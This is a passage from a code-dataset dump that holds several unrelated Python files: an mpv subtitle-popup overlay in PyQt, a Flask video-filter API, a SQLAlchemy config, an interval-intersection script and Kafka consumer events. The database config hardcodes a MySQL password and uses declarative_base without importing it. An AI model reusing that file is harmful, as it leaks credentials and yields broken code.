self.update_subtitles.emit(True, tmp_file_subs)\n            inc += 1\n            \n            if not hidden:\n                try:\n                    tmp_file_subs = open(sub_file).read()\n                except Exception:\n                    continue\n                \n                if tmp_file_subs != subs:\n                    self.update_subtitles.emit(False, tmp_file_subs)\n                    \n                    subs = tmp_file_subs\n\n\nclass Popup(QtWebEngineWidgets.QWebEngineView):\n    def __init__(self, parent=None):\n        # initialize the immediate base class (QWebEngineView); naming the base\n        # class explicitly in super() would skip its __init__ entirely\n        super().__init__()\n        self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)\n        \n        webEnginePage = self.page()\n        webEnginePage.setBackgroundColor(Qt.transparent)\n        \n        self.setWindowFlags(Qt.X11BypassWindowManagerHint)\n        \n        self.zoom_rate = parent.parent.config.default_zoom_popup\n        self.setZoomFactor(self.zoom_rate)\n        \n        self.html_path = os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n                                      'rikai-mpv/rikaichamp-backend/web_page/my_attempt.html')\n        \n        # used for rounding when rezooming\n        self.last_round = 1\n        \n        # used to keep track of zoom changes\n        self.zoom_timed = 0\n        \n        # this records the vertical scrolling in the popup\n        self.scroll_y = 0\n    \n    def change_zoom(self, event):\n        # Ctrl+Alt+\"+\" or Ctrl+Alt+\"-\" for zooming\n        if ((event.modifiers() & Qt.ControlModifier)\n                and (event.modifiers() & Qt.AltModifier)):\n            proceed_zooming 
= False\n if event.key() == Qt.Key_Up and self.zoom_rate < 2:\n proceed_zooming = True\n up_or_down = 1\n \n if event.key() == Qt.Key_Down and self.zoom_rate > 0.3:\n proceed_zooming = True\n up_or_down = -1\n \n if proceed_zooming is True:\n self.zoom_rate = self.zoom_rate + up_or_down * 0.05\n self.zoom_timed = self.zoom_timed + up_or_down\n \n self.setZoomFactor(self.zoom_rate)\n \n new_width = self.width() + up_or_down * self.base_width * 0.05\n new_height = self.height() + up_or_down * self.base_height * 0.05\n \n new_width_int, new_height_int = self.round_up_down(new_width, new_height)\n\n self.move(self.pos().x(),\n self.pos().y() + self.height() - new_height_int)\n \n self.resize(new_width_int, new_height_int)\n \n # this function is needed because depending on the rounding we apply and if the zoom\n # is changed many times, we may encounter unexpected position / size.\n def round_up_down(self, x, y):\n if self.last_round == -1:\n self.last_round = 1\n return math.ceil(x), math.ceil(y)\n else:\n self.last_round = -1\n return math.floor(x), math.floor(y)\n\n\nclass TextWidget(QTextEdit):\n def __init__(self, parent=None):\n super().__init__()\n \n self.setMouseTracking(True)\n self.setReadOnly(True)\n self.setCursorWidth(0)\n \n self.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n \n self.setAlignment(Qt.AlignVCenter)\n \n self.setLineWrapMode(QTextEdit.LineWrapMode.NoWrap)\n \n self.document().setDocumentMargin(0)\n self.setContentsMargins(0, 0, 0, 0)\n \n self.verticalScrollBar().setEnabled(False)\n self.horizontalScrollBar().setEnabled(False)\n \n self.n_lines = 1\n \n self.text = \"\"\n \n self.previous_lookup = \"\"\n \n self.parent = parent\n self.pos_parent = QPoint(0, 0)\n \n self.popup = Popup(self)\n self.popup.move(self.parent.config.x_screen, self.parent.config.y_screen)\n self.popup.resize(800, 800)\n \n font = self.currentFont()\n font.setPointSize(self.parent.config.default_font_point_size)\n font.setStyleStrategy(QFont.StyleStrategy.PreferAntialias)\n self.setFont(font)\n \n self.render_ready = 0\n \n self.released = True\n \n # `True` corresponds to the case where there is currently no popup being shown\n self.no_popup = True\n \n self.transparent_pen = QPen(Qt.transparent)\n self.outline_pen = QPen(Qt.black, 8)\n \n # whether or not the cursor is on the QTextEdit\n self.already_in = False\n \n # index of the character the mouse is on when popup is to be shown\n self.char_index_popup = -1\n \n # number of characters to highlight when the popup is shown\n self.length_highlight = 0\n \n # execution after the html of the popup has been loaded\n self.popup.loadFinished.connect(self.after_popup_loaded)\n \n self.popup_showing_ready = True\n \n # set to True when a warning message to show only once has been shown\n self.warning_message_unique_shown = False\n \n def after_popup_loaded(self, arg):\n self.popup.page().runJavaScript(\n \"\"\"\n try {\n document.getElementById('rikaichamp-window').scrollWidth;\n }\n catch(err) {\n err.message;\n }\n \"\"\",\n self.callback_popup_width)\n \n self.popup.page().runJavaScript(\n \"\"\"\n try {\n document.getElementById('rikaichamp-window').scrollHeight;\n }\n catch(err) {\n err.message;\n }\n \"\"\",\n self.callback_popup_height)\n \n def callback_popup_height(self, new_height):\n if new_height != \"Cannot read property 'scrollHeight' of null\":\n self.popup.base_height = new_height\n \n self.popup_showing_ready = True # From here, we 
don't care about the .html file\n            \n            self.show_popup()\n        else:\n            warnings.warn('Popup page loading has failed and this should not happen.'\n                          + ' Please file a bug report if this gets inconvenient.',\n                          stacklevel=2)\n    \n    def callback_popup_width(self, new_width):\n        if new_width != \"Cannot read property 'scrollHeight' of null\":\n            self.popup.base_width = new_width\n        else:\n            warnings.warn('Popup page loading has failed and this should not happen.'\n                          + ' Please file a bug report if this gets inconvenient.',\n                          stacklevel=2)\n    \n    def show_popup(self):\n        if self.already_in: # it could be that we exited the subtitles before getting there\n            # we need this to take into account the zoom setting previously set\n            \n            width = self.popup.base_width * (self.parent.config.default_zoom_popup\n                                             + 0.05 * self.popup.zoom_timed) + 5\n            height = self.popup.base_height * (self.parent.config.default_zoom_popup\n                                               + 0.05 * self.popup.zoom_timed) + 5\n            \n            # the pop up is shown above the subtitles, and it should not exceed the\n            # available space there, namely `self.pos_parent.y()`\n            height = min(self.pos_parent.y(), height)\n            \n            width = int(width)\n            height = int(height)\n            \n            char_index = self.char_index_popup\n            self.set_text_selection(char_index, char_index + self.length_highlight)\n            \n            rect = self.cursorRect(self.textCursor())\n            \n            # absolute coordinate of the top left of the current selection\n            cursor_top = self.viewport().mapToGlobal(QPoint(rect.left(), rect.top()))\n            \n            x_screen = self.parent.config.x_screen\n            x_popup = (cursor_top.x()\n                       - self.fontMetrics().width(self.text[char_index:char_index\n                                                            + self.length_highlight])\n                       + self.fontMetrics().width(self.text[char_index]) // 4)\n            \n            # make sure we don't go out of the screen\n            if x_popup + width >= (x_screen + self.parent.config.screen_width):\n                x_popup = x_screen + self.parent.config.screen_width - width\n            \n            y_popup = max(0, self.pos_parent.y() - height)\n            \n            # we need to be careful to never cover the QTextEdit when changing popup\n            if self.popup.height() > height:\n                self.popup.resize(width, height)\n                self.popup.move(x_popup, y_popup)\n            else:\n                self.popup.move(x_popup, y_popup)\n                self.popup.resize(width, height)\n            \n            self.popup.show()\n            \n            self.no_popup = True\n    \n    def mouseMoveEvent(self, event):\n        point_position = event.pos() # this is relative coordinates in the QTextEdit\n        char_index = self.document().documentLayout().hitTest(\n            QPointF(point_position.x(), point_position.y()),\n            Qt.HitTestAccuracy.ExactHit)\n        \n        if (self.text[char_index:] != self.previous_lookup\n                and 0 <= char_index\n                and char_index < self.len_text):\n            \n            self.previous_lookup = self.text[char_index:]\n            self.setUpdatesEnabled(True) # we need updates for highlighting text\n            self.no_popup = False # a popup is likely to be shown, disable highlighting\n            \n            # print('Looking up', self.text[char_index:], '...')\n            \n            client.send(self.text[char_index:].encode())\n            \n            data_received = None\n            while True: # this is subideal and should probably be in a separate thread\n                data_received = client.recv(1024)\n                \n                decoded_data = data_received.decode()\n                \n                if decoded_data.startswith('ready'): # node has finished its processing\n                    nb_highlight = int(decoded_data[5:]) # the beginning is 'ready'\n\n                    if nb_highlight == -1: # e.g., the popup is empty\n                        show_popup = False\n                        self.popup.hide() # hide it in case it was already shown\n                        self.set_text_selection(0, 0)\n                    else:\n                        show_popup = True\n                        self.length_highlight = nb_highlight\n                    \n                    break\n            \n            if show_popup is True:\n                self.popup.scroll_y = 0\n                
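# remember which character triggered this lookup; show_popup() re-highlights\n                # the matched span from it and anchors the popup beside the selection\n                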
self.char_index_popup = char_index\n                self.popup_reset = True\n                \n                # this resize is \"needed\" as I could so far not set the width of\n                # the popup no matter the size of the window. We make it bigger so that\n                # the `scrollWidth` value we get later makes sense\n                resize_value = (self.parent.config.x_screen\n                                + self.parent.config.screen_width - self.popup.pos().x())\n                self.popup.resize(resize_value, self.popup.height())\n                \n                # this show is needed to record later on the right size of the popup\n                # in case it was not shown already\n                self.popup.show()\n                \n                if self.popup_showing_ready:\n                    self.popup_showing_ready = False\n                    self.popup.load(QUrl.fromLocalFile(self.popup.html_path))\n                else:\n                    # the previous .html file is still being used, which is typically\n                    # the case when the mouse moves too fast. This is really subideal and\n                    # another solution should be found to avoid reading and writing .html\n                    # files at the same time...\n                    if not self.warning_message_unique_shown:\n                        warnings.warn('Ignore this popup showing as it is likely to fail.'\n                                      + ' Please file a bug report if this gets inconvenient.'\n                                      + \" This warning won't be shown again.\",\n                                      stacklevel=2)\n                        self.warning_message_unique_shown = True\n                    pass\n    \n    def enterEvent(self, event):\n        # the case where this event is triggered several times has been encountered,\n        # hence the `self.already_in`\n        if not self.already_in:\n            self.already_in = True\n            self.setUpdatesEnabled(True)\n            self.previously_paused = mpv_pause_status()\n            mpv_pause()\n        \n        super().enterEvent(event)\n    \n    def leaveEvent(self, event):\n        if not self.previously_paused:\n            mpv_resume()\n        \n        self.already_in = False\n        \n        self.setUpdatesEnabled(True)\n        \n        # reset selection\n        self.set_text_selection(0, 0)\n        \n        # reset it in case we want to look back at the same position\n        self.previous_lookup = \"\"\n        \n        # hiding popup in case it was shown\n        self.popup.hide()\n        \n        super().leaveEvent(event)\n    \n    def mousePressEvent(self, event):\n        # we want to zoom in/out the popup, but set focus to this QTextEdit because\n        # I could not properly redirect the keyPress events to the popup\n        if event.button() == Qt.MouseButton.RightButton:\n            self.activateWindow()\n            self.setFocus()\n        \n        # we want to set focus to the parent frame, to likely zoom in/out the subtitles\n        elif event.button() == Qt.LeftButton:\n            super().mousePressEvent(event)\n            self.parent.activateWindow()\n            self.parent.setFocus()\n        else:\n            pass\n    \n    def keyPressEvent(self, event): # this should handle only the popup zoom\n        self.popup.change_zoom(event)\n        super().keyPressEvent(event)\n    \n    # we do not want the context menu to display and steal focus\n    def contextMenuEvent(self, event):\n        pass\n    \n    def paintEvent(self, event):\n        # this is just a trick to avoid an infinite loop due to the painting of the\n        # outline, as the line `my_cursor.select(QTextCursor.SelectionType.Document)`\n        # triggers a recursive call to `paintEvent`\n        self.render_ready += 1\n        \n        if self.render_ready > 3 and self.no_popup:\n            self.setUpdatesEnabled(False)\n            \n            # Showing the outline is really slow (at times, more than 100 ms) and\n            # we do not want to do it when the user shows popups, as it slows everything down.\n            # Ideally, it could probably be in a separate thread.\n            if not self.already_in:\n                painter = QPainter(self.viewport())\n                \n                my_cursor = self.textCursor()\n                my_char_format = my_cursor.charFormat()\n                \n                my_char_format.setTextOutline(self.outline_pen)\n                \n                my_cursor.select(QTextCursor.SelectionType.Document)\n                my_cursor.mergeCharFormat(my_char_format)\n                \n                
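# paint the outlined glyphs once here; the transparent pen is restored right\n                # after, so the base paintEvent can draw the plain text on top\n                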
self.document().drawContents(painter)\n \n my_char_format.setTextOutline(self.transparent_pen)\n my_cursor.mergeCharFormat(my_char_format)\n \n super().paintEvent(event)\n \n # wheel events are unfortunately captured by the QTextEdit, but should be redirected\n # to the popup in case the entries take too much place\n def wheelEvent(self, event):\n # reasonable scroll policy. Note however that system-wide pad up/down movement\n # setting may not apply and has not been tested\n self.popup.scroll_y = (- sign(event.angleDelta().y())\n * self.parent.config.screen_height / 15)\n \n script = f\"window.scrollTo(0, document.scrollingElement.scrollTop + {self.popup.scroll_y});\"\n self.popup.page().runJavaScript(script)\n \n def minimumSizeHint(self):\n return QSize(5, 5)\n \n def set_text_selection(self, start, end):\n cursor = self.textCursor()\n cursor.setPosition(start)\n cursor.setPosition(end, QTextCursor.KeepAnchor)\n self.setTextCursor(cursor)\n\n\nclass ParentFrame(QFrame):\n def __init__(self, config):\n super().__init__()\n \n self.thread_subs = QThread()\n self.obj = thread_subtitles()\n self.obj.update_subtitles.connect(self.render_subtitles)\n self.obj.moveToThread(self.thread_subs)\n self.thread_subs.started.connect(self.obj.main)\n self.thread_subs.start()\n \n self.config = config\n \n self.setWindowFlags(Qt.X11BypassWindowManagerHint)\n \n self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground, True)\n self.setStyleSheet(config.style_subs)\n \n self.subtext = TextWidget(parent=self)\n \n self.subtitles_vbox = QVBoxLayout(self)\n self.subtitles_vbox.addStretch()\n self.v_margin = 0\n self.subtitles_vbox.setContentsMargins(0, self.v_margin, 0, self.v_margin)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.subtext)\n \n self.subtitles_vbox.addLayout(hbox)\n self.subtitles_vbox.addStretch()\n \n # we add some pixels to the semi-transparent background, up and down\n self.stretch_pixels = 20\n \n def render_subtitles(self, to_hide, text):\n # print(\"-------\")\n # print(\"Input: `\" + text + \"`\")\n self.subtext.render_ready = 0\n \n if to_hide or not len(text):\n try:\n self.subtext.clear()\n self.hide()\n finally:\n return\n\n self.subtext.setUpdatesEnabled(True)\n self.subtext.clear()\n self.repaint()\n \n self.subtext.setAlignment(Qt.AlignCenter) # this should be before .show()\n self.show()\n\n subs2 = text\n \n subs2 = subs2.split('\\n')\n for i in range(len(subs2)):\n subs2[i] = subs2[i].strip()\n subs2[i] = \" \" + subs2[i] + \" \"\n \n subs2 = '\\n'.join(subs2)\n \n self.subtext.len_text = len(subs2)\n self.subtext.text = subs2\n self.subtext.text_splitted = subs2.split('\\n')\n self.subtext.n_lines = len(self.subtext.text_splitted)\n \n # the longest line is not necessarily the one with the most characters\n # as we may use non-monospace fonts\n width_subtext = 0\n for line in self.subtext.text_splitted:\n width_subtext = max(width_subtext,\n self.subtext.fontMetrics().boundingRect(\n QRect(),\n Qt.AlignCenter,\n line).width()\n + 4)\n \n height_subtext = self.subtext.fontMetrics().height() * self.subtext.n_lines + 4\n \n width = width_subtext\n height = height_subtext + self.stretch_pixels\n \n x = (self.config.screen_width / 2) - (width / 2)\n y = self.config.screen_height - height - config.bottom_spacing_pixels\n \n self.setGeometry(config.x_screen + int(x),\n config.y_screen + int(y),\n width, height)\n \n self.subtext.setGeometry(0, self.stretch_pixels // 2,\n width_subtext, height_subtext)\n \n for line in self.subtext.text_splitted:\n self.subtext.append(line)\n 
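# cache the frame's on-screen position; show_popup() reads it to keep the popup above the subtitle area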
\n self.subtext.pos_parent = self.pos()\n \n self.subtext.render_ready += 1\n \n def keyPressEvent(self, event):\n self.subtext.setUpdatesEnabled(True)\n \n # Ctrl+Alt+\"+\" or Ctrl+Alt+\"-\" for zooming\n if ((event.modifiers() & Qt.ControlModifier)\n and (event.modifiers() & Qt.AltModifier)):\n \n # check if non-zero later, and act accordingly\n resized = 0\n \n if event.key() == Qt.Key_Up:\n resized = 2\n if event.key() == Qt.Key_Down:\n resized = -2\n \n if resized != 0:\n self.subtext.render_ready = 0\n \n font = self.subtext.currentFont()\n font.setPointSize(font.pointSize() + resized)\n self.subtext.setFont(font)\n \n width_subtext = 0\n for line in self.subtext.text_splitted:\n width_subtext = max(width_subtext,\n self.subtext.fontMetrics().boundingRect(\n QRect(),\n Qt.AlignCenter,\n line).width()\n + 4)\n height_subtext = (self.subtext.fontMetrics().height()\n * self.subtext.n_lines + 4)\n \n width = width_subtext\n height = height_subtext + self.stretch_pixels\n \n x = (self.config.screen_width / 2) - (width / 2)\n y = self.config.screen_height - height - config.bottom_spacing_pixels\n \n self.setGeometry(config.x_screen + int(x),\n config.y_screen + int(y),\n width, height)\n \n self.subtext.setGeometry(0, self.stretch_pixels // 2,\n width_subtext, height_subtext)\n\n self.subtext.pos_parent = self.pos()\n \n self.subtext.render_ready += 1\n \n def paintEvent(self, event):\n if self.subtext.render_ready >= 1:\n p = QPainter(self)\n p.fillRect(event.rect(), QColor(0, 0, 0, 128))\n \n super().paintEvent(event)\n\n\nif __name__ == \"__main__\":\n print('[rikai-mpv] Starting rikai-mpv in python...')\n \n mpv_socket = sys.argv[1]\n sub_file = sys.argv[2]\n # sub_file = '/tmp/mpv_sub_'\n # mpv_socket = '/tmp/mpv_socket_'\n \n # the `mpv_socket` at the end is just a trick to handle termination in lua,\n # so that we can find the node process with `pkill` or `pgrep`\n command = ('node '\n + os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n 'rikai-mpv/rikaichamp-backend/extension/background_search_html.js')\n + ' '\n + mpv_socket)\n \n command_splitted = command.split(' ')\n \n print(\"Launching node.js backend...\")\n subprocess.Popen(command_splitted, shell=False)\n\n print(\"Connecting from Python...\")\n while True:\n try:\n client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n client.connect(os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n \"rikai-mpv/my_socket\"))\n except Exception:\n time.sleep(0.1)\n continue\n break\n print(\"python <---> node.js socket connected.\")\n \n app = QApplication(sys.argv)\n \n config.screen_width = app.screens()[config.n_screen].size().width()\n config.screen_height = app.screens()[config.n_screen].size().height()\n config.x_screen = app.screens()[config.n_screen].geometry().x()\n config.y_screen = app.screens()[config.n_screen].geometry().y()\n \n form = ParentFrame(config)\n form.show()\n app.exec_()\n","repo_name":"fxmarty/rikai-mpv","sub_path":"subtitles_popup_graphics.py","file_name":"subtitles_popup_graphics.py","file_ext":"py","file_size_in_byte":26817,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"15696673901","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nauthor: S.M. 
Sabbir Amin\ndate: 23 Jun 2021\nemail: sabbiramin.cse11ruet@gmail.com, sabbir@rokomari.com\n\n\"\"\"\nimport operator\nfrom functools import reduce\n\nfrom flask import jsonify\nfrom playhouse.shortcuts import model_to_dict\nfrom webargs import fields\nfrom webargs.flaskparser import use_args\n\nfrom app import app\nfrom app.models import Video\n\nuser_args = {\n    'page': fields.Int(missing=1),\n    'size': fields.Int(missing=30),\n    'tags': fields.DelimitedList(fields.Str()),\n    'view_count_lt': fields.Int(required=False),\n    'view_count_gt': fields.Int(required=False),\n    'view_count_eq': fields.Int(required=False),\n    'like_count_lt': fields.Int(required=False),\n    'like_count_gt': fields.Int(required=False),\n    'like_count_eq': fields.Int(required=False),\n    'comment_count_lt': fields.Int(required=False),\n    'comment_count_gt': fields.Int(required=False),\n    'comment_count_eq': fields.Int(required=False),\n    'dislike_count_lt': fields.Int(required=False),\n    'dislike_count_gt': fields.Int(required=False),\n    'dislike_count_eq': fields.Int(required=False),\n\n}\n\n\n@app.route('/api/v1/videos', methods=['GET'])\n@use_args(user_args, location='query')\ndef get_videos(args):\n    page = args.get('page')\n    size = args.get('size')\n    tags = args.get('tags')\n    view_count_lt = args.get('view_count_lt')\n    view_count_gt = args.get('view_count_gt')\n    view_count_eq = args.get('view_count_eq')\n    like_count_lt = args.get('like_count_lt')\n    like_count_gt = args.get('like_count_gt')\n    like_count_eq = args.get('like_count_eq')\n    comment_count_lt = args.get('comment_count_lt')\n    comment_count_gt = args.get('comment_count_gt')\n    comment_count_eq = args.get('comment_count_eq')\n    dislike_count_lt = args.get('dislike_count_lt')\n    dislike_count_gt = args.get('dislike_count_gt')\n    dislike_count_eq = args.get('dislike_count_eq')\n\n    # build each clause at most once; compare against None so that 0 is a usable\n    # filter value\n    sql_clause = list()\n    if view_count_eq is not None:\n        sql_clause.append(Video.view_count == view_count_eq)\n    if view_count_lt is not None:\n        sql_clause.append(Video.view_count < view_count_lt)\n    if view_count_gt is not None:\n        sql_clause.append(Video.view_count > view_count_gt)\n    if tags:\n        for tag in tags:\n            sql_clause.append(Video.tags.contains(tag))\n    if like_count_lt is not None:\n        sql_clause.append(Video.like_count < like_count_lt)\n    if like_count_gt is not None:\n        sql_clause.append(Video.like_count > like_count_gt)\n    if like_count_eq is not None:\n        sql_clause.append(Video.like_count == like_count_eq)\n    if comment_count_lt is not None:\n        sql_clause.append(Video.comment_count < comment_count_lt)\n    if comment_count_gt is not None:\n        sql_clause.append(Video.comment_count > comment_count_gt)\n    if comment_count_eq is not None:\n        sql_clause.append(Video.comment_count == comment_count_eq)\n    if dislike_count_lt is not None:\n        sql_clause.append(Video.dislike_count < dislike_count_lt)\n    if dislike_count_gt is not None:\n        sql_clause.append(Video.dislike_count > dislike_count_gt)\n    if dislike_count_eq is not None:\n        sql_clause.append(Video.dislike_count == dislike_count_eq)\n\n    # AND all clauses together; an empty clause list means no filtering\n    if sql_clause:\n        exp = reduce(operator.and_, sql_clause)\n    else:\n        exp = None\n\n    if exp:\n        queryset = Video.select().where(exp).paginate(page, size)\n    else:\n        queryset = Video.select().paginate(page, size)\n    models = [model_to_dict(r) for r in queryset]\n    response = dict()\n    response['count'] = len(models)\n    response['models'] = models\n    return jsonify(response)\n","repo_name":"sabbiramin113008/py_tube","sub_path":"app/api/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"32377823820","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy.orm 
import sessionmaker\n\nengine = create_engine(\n \"mysql+pymysql://admin_cesfam:cesfam1359@localhost:3306/dbcesfam\",\n connect_args={'connect_timeout': 600},\n pool_pre_ping=True\n)\nSession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\nsession = Session() \n\nBase = declarative_base()\n\ndef get_db():\n try:\n db = Session()\n yield db\n finally:\n db.close()","repo_name":"vcrolack/farmacia-cesfam-backend","sub_path":"config/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12162662126","text":"\n\ndef intervalIntersection(A, B):\n aIndex = 0\n bIndex = 0\n toReturn = []\n arg1 = A[aIndex]\n arg2 = B[bIndex]\n flag = True\n\n def compareArrs(aArr, bArr):\n signifyInd = \"\"\n zipComp = zip(aArr, bArr)\n compList = list(zipComp)\n lowIntSec = max(compList[0])\n highIntSec = min(compList[1])\n\n if aArr[0] > bArr[1]:\n signifyInd = \"B\"\n intersection = \"NO INTERSECTION\"\n elif bArr[0] > aArr[1]:\n signifyInd = \"A\"\n intersection = \"NO INTERSECTION\"\n else:\n if aArr[1] == highIntSec:\n signifyInd = \"A\"\n elif bArr[1] == highIntSec:\n signifyInd = \"B\"\n\n intersection = [lowIntSec, highIntSec]\n\n return [intersection, signifyInd]\n\n while flag:\n arg1 = A[aIndex]\n arg2 = B[bIndex]\n flag = False\n result = compareArrs(arg1, arg2)\n print(result)\n if result[0] == \"NO INTERSECTION\":\n pass\n else:\n toReturn.append(result[0])\n\n if result[1] == \"A\":\n if aIndex == len(A)-1:\n print(toReturn)\n return toReturn\n else:\n aIndex += 1\n print(\"aIndex\", aIndex)\n flag = True\n\n elif result[1] == \"B\":\n if bIndex == len(B)-1:\n print(toReturn)\n return toReturn\n else:\n bIndex += 1\n print(\"bIndex\", bIndex)\n flag = True\n\n return toReturn\n\n\nA = [[0, 2], [5, 10], [13, 23], [24, 25]]\n\nB = [[1, 5], [8, 12], [15, 24], [25, 26]]\n\n\nintervalIntersection(A, B)\n","repo_name":"theolamide/Whiteboard","sub_path":"Python/intervalIntersection.py","file_name":"intervalIntersection.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19770907592","text":"from abc import ABC, abstractmethod\r\nfrom typing import Generic, TypeVar, Type\r\n\r\nfrom pydantic import BaseModel\r\n\r\nfrom services import RestaurantService, RestaurantManagerService\r\nfrom uow import SqlAlchemyUnitOfWork\r\nfrom utils.uow import uow_transaction, uow_transaction_with_commit\r\n\r\nfrom .schemas import RestaurantApplicationConfirmedSchema, RestaurantActivatedSchema, RestaurantDeactivatedSchema, \\\r\n RestaurantManagerCreatedSchema\r\n\r\n__all__ = [\r\n \"ConsumerEvent\",\r\n \"RestaurantApplicationConfirmedEvent\",\r\n \"RestaurantActivatedEvent\",\r\n \"RestaurantDeactivatedEvent\",\r\n \"RestaurantManagerCreatedEvent\",\r\n]\r\n\r\nBaseEventSchema = TypeVar(\"BaseEventSchema\", bound=BaseModel)\r\n\r\n\r\nclass ConsumerEvent(Generic[BaseEventSchema], ABC):\r\n \"\"\"\r\n Base class for all consumer events.\r\n\r\n Consumer events are used for simplifying receiving messages from Kafka and processing them.\r\n\r\n Attributes:\r\n schema_class (Type[BaseEventSchema]): The schema class for the event's data.\r\n \"\"\"\r\n\r\n schema_class: Type[BaseEventSchema] = None\r\n\r\n def __init__(self, data: dict):\r\n \"\"\"\r\n Constructor for the inherited classes from ConsumerEvent class.\r\n\r\n Args:\r\n data (dict): The received data.\r\n \"\"\"\r\n\r\n 
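# building the pydantic schema here validates the payload up front, so a\r\n        # malformed Kafka message fails fast instead of deep inside the handler\r\n        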
self._data: BaseEventSchema = self.schema_class(**data)\r\n\r\n @abstractmethod\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Action to be executed on the event.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n raise NotImplementedError\r\n\r\n @classmethod\r\n def get_event_name(cls) -> str:\r\n \"\"\"\r\n Returns the name of the event.\r\n\r\n Returns:\r\n str: Name of the event.\r\n \"\"\"\r\n\r\n return cls.__name__\r\n\r\n\r\nclass RestaurantApplicationConfirmedEvent(ConsumerEvent[RestaurantApplicationConfirmedSchema]):\r\n \"\"\"\r\n Event when RestaurantApplication is confirmed.\r\n \"\"\"\r\n\r\n schema_class = RestaurantApplicationConfirmedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Creates a new restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.create(self._data, uow)\r\n\r\n\r\nclass RestaurantActivatedEvent(ConsumerEvent[RestaurantActivatedSchema]):\r\n \"\"\"\r\n Event when Restaurant is activated.\r\n \"\"\"\r\n\r\n schema_class = RestaurantActivatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Activates a restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.activate(self._data.id, uow)\r\n\r\n\r\nclass RestaurantDeactivatedEvent(ConsumerEvent[RestaurantDeactivatedSchema]):\r\n \"\"\"\r\n Event when Restaurant is deactivated.\r\n \"\"\"\r\n\r\n schema_class = RestaurantDeactivatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Deactivates a restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.deactivate(self._data.id, uow)\r\n\r\n\r\nclass RestaurantManagerCreatedEvent(ConsumerEvent[RestaurantManagerCreatedSchema]):\r\n \"\"\"\r\n Event when RestaurantManager is created.\r\n \"\"\"\r\n\r\n schema_class = RestaurantManagerCreatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Creates a new restaurant manager.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_manager_service = RestaurantManagerService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_manager_service.create(self._data, uow)\r\n","repo_name":"Ash1VT/food-delivery-backend","sub_path":"menu/src/consumer/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36343026507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) @AlbertEinsteinTG \n\n\nfrom pyrogram import filters, Client, __version__\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery, Message\nfrom bot import Translation # pylint: disable=import-error\nfrom bot.database import Database # pylint: disable=import-error\nimport asyncio\nfrom pyrogram.errors import FloodWait\nfrom bot.bot import Bot\nfrom bot import ADMINS, OWNER_ID, DISABLE_CHANNEL_BUTTON\nfrom 
